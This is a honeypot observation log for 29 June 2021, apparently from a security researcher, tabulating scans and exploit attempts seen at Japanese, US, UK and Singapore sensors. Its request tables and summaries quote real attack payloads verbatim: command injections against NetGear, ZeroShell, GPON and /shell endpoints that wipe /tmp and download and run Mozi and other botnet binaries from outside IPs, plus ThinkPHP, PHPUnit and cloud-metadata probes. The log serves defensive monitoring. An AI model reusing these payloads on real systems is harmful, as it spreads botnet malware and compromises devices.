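Honeypot (tentative) observation log for 2021/06/29.
Characteristics
Common
- Access targeting GPON router vulnerabilities
- Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
- Access targeting the PHPUnit vulnerability (CVE-2017-9841)
- Access targeting ThinkPHP vulnerabilities
- Scanning by zgrab
- Scanning for Apache Solr
- Scanning for Apache Tomcat
- Scanning for Laravel
- Scanning for WordPress plugins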
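Location:JP
The following were observed:
- Access targeting the ZeroShell Linux Router vulnerability (CVE-2020-29390)
- Access targeting cloud environment metadata
- Scanning for /.env
- Access with the UserAgent "Hello, World"
The following access to /shell was observed: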
cd /tmp; rm -rf *; wget 162.55.171.138/jaws; sh /tmp/jaws
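Location:US
The following were observed:
- Access targeting DrayTek product vulnerabilities
- Access targeting Drupal vulnerabilities
- Access targeting NetGear product vulnerabilities
- Access targeting Spring Boot vulnerabilities
- Scanning by Nmap Scripting Engine
- Scanning by XTC
- Scanning by ZmEu
- Scanning for .css
- Scanning for .js
- Scanning for /.env
- Scanning for phpMyAdmin
- Scanning for WordPress
- Access with the UserAgent "Hello, world"
The following access to /shell was observed: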
cd /tmp; rm -rf *; wget 104.168.98.105/bins/z0r0.arm7; chmod 777 /tmp/z0r0.arm7; sh /tmp/z0r0.arm7 7Binks.Rep.Jaws
Location:UK
The following were observed:
- Access with the UserAgent "Hello, World"
- Access with the UserAgent "Hello, world"
The following access to /shell was observed:
cd /tmp; rm -rf *; wget http[:]//27[.]45[.]90[.]190:45806/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
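Location:SG
The following were observed:
- Access targeting NetGear product vulnerabilities
- Access targeting Spring Boot vulnerabilities
- Scanning by Nmap Scripting Engine
- Scanning by Wget
- Scanning for /.env
- Scanning for phpMyAdmin
- Access with the UserAgent "Hello, World"
- Access with the UserAgent "Hello, world"
The following access to /shell was observed: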
cd /tmp; rm -rf *; wget http[:]//115[.]61[.]160[.]112:33077/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
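Other
Access count trend
JP: total accesses: 52 (change from previous day: -18)
US: total accesses: 234 (change from previous day: +191)
UK: total accesses: 38 (change from previous day: -4)
SG: total accesses: 52 (change from previous day: +11)
GET / HTTP/1.1 and POST / HTTP/1.1 are excluded for practical reasons.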
Location:JP
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
19 | - |
4 | Chrome/54.0 (Windows NT 10.0) |
1 | Hello, World |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
8 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) |
3 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | |||
1 | \x16\x03 | ||
3 | \x16\x03\x01\x01\xfa\x01 | ||
1 | \x16\x03\x02\x01o\x01 | ||
8 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user | HTTP/1.0 |
10 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
3 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 162.55.171.138/jaws;sh+/tmp/jaws | |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//169[.]254[.]169[.]254/latest/meta-data/ | HTTP/1.1 |
2 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
58 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.52 |
117 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 |
22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
9 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
3 | Mozilla/5.0 zgrab/0.x |
1 | Wget/1.18 (linux-gnu) |
1 | XTC |
6 | ZmEu |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
31 | - | ||
1 | \x16\x03\x01\x014\x01 | ||
15 | \x16\x03\x01\x01\xfb\x01 | ||
3 | \x16\x03\x01\x02 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
10 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= | HTTP/1.1 |
1 | GET | /Content/common/web/CommonActivity.css | HTTP/1.1 |
1 | GET | /Content/css/wzwstylel.css | HTTP/1.1 |
1 | GET | /Content/favicon.ico | HTTP/1.1 |
1 | GET | /Css/Hm.css | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /Home/Bind/binding | HTTP/1.1 |
1 | GET | /Home/Get/getJnd28 | HTTP/1.1 |
1 | GET | /Home/GetAllGameCategory | HTTP/1.1 |
1 | GET | /Home/Index/ajaxTJ | HTTP/1.1 |
1 | GET | /JS/loginstatus.js | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /Pc/Lang/index.html | HTTP/1.1 |
1 | GET | /Promotions/list.mvc | HTTP/1.1 |
1 | GET | /Public/Home/images/game/pk10.png | HTTP/1.1 |
1 | GET | /Public/Home/js/cls.js | HTTP/1.1 |
1 | GET | /Public/Home/js/common.js | HTTP/1.1 |
1 | GET | /Public/Mobile/ecshe_css/wapmain.css?v=1545408652 | HTTP/1.1 |
1 | GET | /Public/home/js/check.js | HTTP/1.1 |
1 | GET | /Public/home/wap/css/qdgame.css | HTTP/1.1 |
1 | GET | /Public/initJs.php | HTTP/1.1 |
1 | GET | /Public/js/common.js | HTTP/1.1 |
1 | GET | /Public/mobile/js/config.js | HTTP/1.1 |
1 | GET | /Recruit/download_url | HTTP/1.1 |
1 | GET | /Template/Mobile/js/main.js | HTTP/1.1 |
1 | GET | /Templates/user/finance/css/userPay.css | HTTP/1.1 |
1 | GET | /Templates/user/js/global.js | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /admin/index | HTTP/1.1 |
1 | GET | /ajax/allcoin_a/id/0?t=0.3782499195965951 | HTTP/1.1 |
1 | GET | /ajax?act=getrlist&rid=1 | HTTP/1.1 |
1 | GET | /api/ApiHub/fetchJinse | HTTP/1.1 |
1 | GET | /api/apps | HTTP/1.1 |
1 | GET | /api/contactWay | HTTP/1.1 |
1 | GET | /api/content_bottom | HTTP/1.1 |
1 | GET | /api/exclude/siteConfig/webSiteConfig | HTTP/1.1 |
1 | GET | /api/message/webInfo | HTTP/1.1 |
1 | GET | /api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1 | HTTP/1.1 |
1 | GET | /api/stock/getSingleStock.do?code=002405 | HTTP/1.1 |
1 | GET | /api/uploads/apimap | HTTP/1.1 |
1 | GET | /api/user/info?&&callback=jsonp_1601457046411_20983 | HTTP/1.1 |
1 | GET | /api/v/index/queryOfficePage?officeCode=customHomeLink | HTTP/1.1 |
1 | GET | /api/v1/invest | HTTP/1.1 |
1 | GET | /api/v1/member/kefu | HTTP/1.1 |
1 | GET | /api/wallet/redDetail | HTTP/1.1 |
1 | GET | /assets/dist/static/js/vendor_prod.js | HTTP/1.1 |
1 | GET | /assets/js/dmshub.js | HTTP/1.1 |
1 | GET | /assets/room/css/room_mobile.css | HTTP/1.1 |
1 | GET | /base/exchange_article/index/classid/1/id/1 | HTTP/1.1 |
1 | GET | /base/exchange_index/changepwdfirst | HTTP/1.1 |
1 | GET | /base/exchange_index/googlecode | HTTP/1.1 |
1 | GET | /common/download.js | HTTP/1.1 |
1 | GET | /common/template/lottery/lecai/css/style.css | HTTP/1.1 |
1 | GET | /config.js | HTTP/1.1 |
1 | GET | /config.php?_=3283&1922563758 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
1 | GET | /csjs/bankCheck.js | HTTP/1.1 |
1 | GET | /css/dafa.css | HTTP/1.1 |
1 | GET | /css/main.css | HTTP/1.1 |
1 | GET | /css/style.css | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
3 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /ff/css/cssy.css | HTTP/1.1 |
1 | GET | /files/pub_rem.js | HTTP/1.1 |
1 | GET | /files/pub_reset.css | HTTP/1.1 |
1 | GET | /getConfig/getArticle.do?code=19 | HTTP/1.1 |
1 | GET | /getConfig/listPopFrame.do?code=14&position=index&_=1601489645097 | HTTP/1.1 |
1 | GET | /getLocale | HTTP/1.1 |
2 | GET | /h5/ | HTTP/1.1 |
1 | GET | /homes/ | HTTP/1.1 |
1 | GET | /iframe/rankgiftgotapi/1005 | HTTP/1.1 |
1 | GET | /im/in/GetUuid | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /index/Mobile/kline_week?code=sz003043 | HTTP/1.1 |
1 | GET | /index/index/andiro | HTTP/1.1 |
1 | GET | /infe/rest/flash/getServerIP.json | HTTP/1.1 |
1 | GET | /js/app.ling.js | HTTP/1.1 |
1 | GET | /js/base.js | HTTP/1.1 |
1 | GET | /js/dianzan.js | HTTP/1.1 |
1 | GET | /js/tvConfig.js | HTTP/1.1 |
1 | GET | /kkrps/im_group/show_members | HTTP/1.1 |
1 | GET | /loan | HTTP/1.1 |
1 | GET | /login/img/nyyh/chkjs.js | HTTP/1.1 |
1 | GET | /login/img/nyyh/game.css | HTTP/1.1 |
1 | GET | /m/ | HTTP/1.1 |
1 | GET | /m/ticker/usdtqc | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/js/left.js | HTTP/1.1 |
1 | GET | /mobile/script/main.m.js | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /nmaplowercheck1624917704 | HTTP/1.1 |
1 | GET | /otc/ | HTTP/1.1 |
1 | GET | /pages/console/js/common.js | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /portal/index/protocol.html | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/wap/js/basis.js | HTTP/1.1 |
1 | GET | /resources/main/common.js | HTTP/1.1 |
1 | GET | /room/1002 | HTTP/1.1 |
1 | GET | /s_api/basic/config_js?callback=__set_config | HTTP/1.1 |
1 | GET | /s_api/basic/download/info | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//1[.]10[.]150[.]40:43543/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]229[.]54[.]111:53995/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+104.168.98.105/bins/z0r0.arm7;chmod+777+/tmp/z0r0.arm7;sh+/tmp/z0r0.arm7+7Binks.Rep.Jaws | HTTP/1.1 |
1 | GET | /site.js | HTTP/1.1 |
1 | GET | /site/get-hq?proNo=btc&panType=1&pid=1 | HTTP/1.1 |
1 | GET | /skin/js/common.js | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /static/css/index.css | HTTP/1.1 |
1 | GET | /static/data/thirdgames.json | HTTP/1.1 |
1 | GET | /static/guide/ab.css | HTTP/1.1 |
1 | GET | /static/home/static/js/login.js | HTTP/1.1 |
1 | GET | /static/index/js/lk/order.js | HTTP/1.1 |
1 | GET | /static/wap/css/index.css | HTTP/1.1 |
1 | GET | /static/wap/js/common.js | HTTP/1.1 |
1 | GET | /static/xianyu/js/bankCheck.js | HTTP/1.1 |
1 | GET | /stock/search.html?keyword=00202 | HTTP/1.1 |
1 | GET | /style.css | HTTP/1.1 |
1 | GET | /template/920ka/css/lsy.css | HTTP/1.1 |
1 | GET | /template/920ka/js/woodyapp.js | HTTP/1.1 |
1 | GET | /thriveGame.css | HTTP/1.1 |
1 | GET | /user/Login | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wap/api/exchangerateuserconfig!get.action | HTTP/1.1 |
1 | GET | /wap/trading/get_newallorder_ajax | HTTP/1.1 |
1 | GET | /wap/trading/lastKlineParameter | HTTP/1.1 |
1 | GET | /web/api/getBanner | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | /wp-login.php | HTTP/1.1 |
1 | GET | /ws/index/getTheLotteryInitList | HTTP/1.1 |
1 | GET | /xy/image/jiantou.png | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.0 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /api/system/system/config/get | HTTP/1.1 |
5 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /config | HTTP/1.1 |
1 | POST | /login/kefuxian.mvc | HTTP/1.1 |
1 | POST | /m.api | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//withthis[.]site/7229ebd93edecfa44c3a78bc9bad771920404c83330a318129cac9fd0619797b6f9086bedce0d3cbf64825016d01bc06aa24cec28224599f5a6997cadcf14c70ab03ef943e1b3ac29989c7a28be7e5215140c1e8bf550b55221f7eb21e343913 | HTTP/1.1 |
Location:UK
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
6 | - |
1 | Go-http-client/1.1 |
1 | Hello, World |
1 | Hello, world |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.18.4 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01\x01\xfc\x01 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /nice%20ports%2C/Tri%6Eity.txt%2ebak | HTTP/1.0 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]45[.]90[.]190:45806/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
6 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
Source IP address list
UserAgent list
Count | UserAgent |
---|---|
11 | - |
1 | Hello, World |
1 | Hello, world |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3; rv:52.7.2) Gecko/20100101 Firefox/52.7.2 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
3 | Mozilla/5.0 zgrab/0.x |
1 | Wget/1.18 (linux-gnu) |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | ||
1 | \x16\x03\x01\x014\x01 | ||
6 | \x16\x03\x01\x02 | ||
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
6 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /nmaplowercheck1624859870 | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /phpmyadmin4.8.5/index.php | HTTP/1.1 |
1 | GET | /pmd/index.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]94[.]203[.]148:53380/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]61[.]160[.]112:33077/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//passport[.]baidu[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
8 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//impius[.]fun/0ccf4fab7bf74a3889c531a3db740b505ff3f867983de8f497cccf7f74041aa1238ff65fe62f01f240e5d6519920dffed2388471fbfcacd9cc03eaf0700820e5cc5b3118b9883e5c4ac5079e35c16fbb317e3ce92d3fbc8f5b226655dfd78187 | HTTP/1.1 |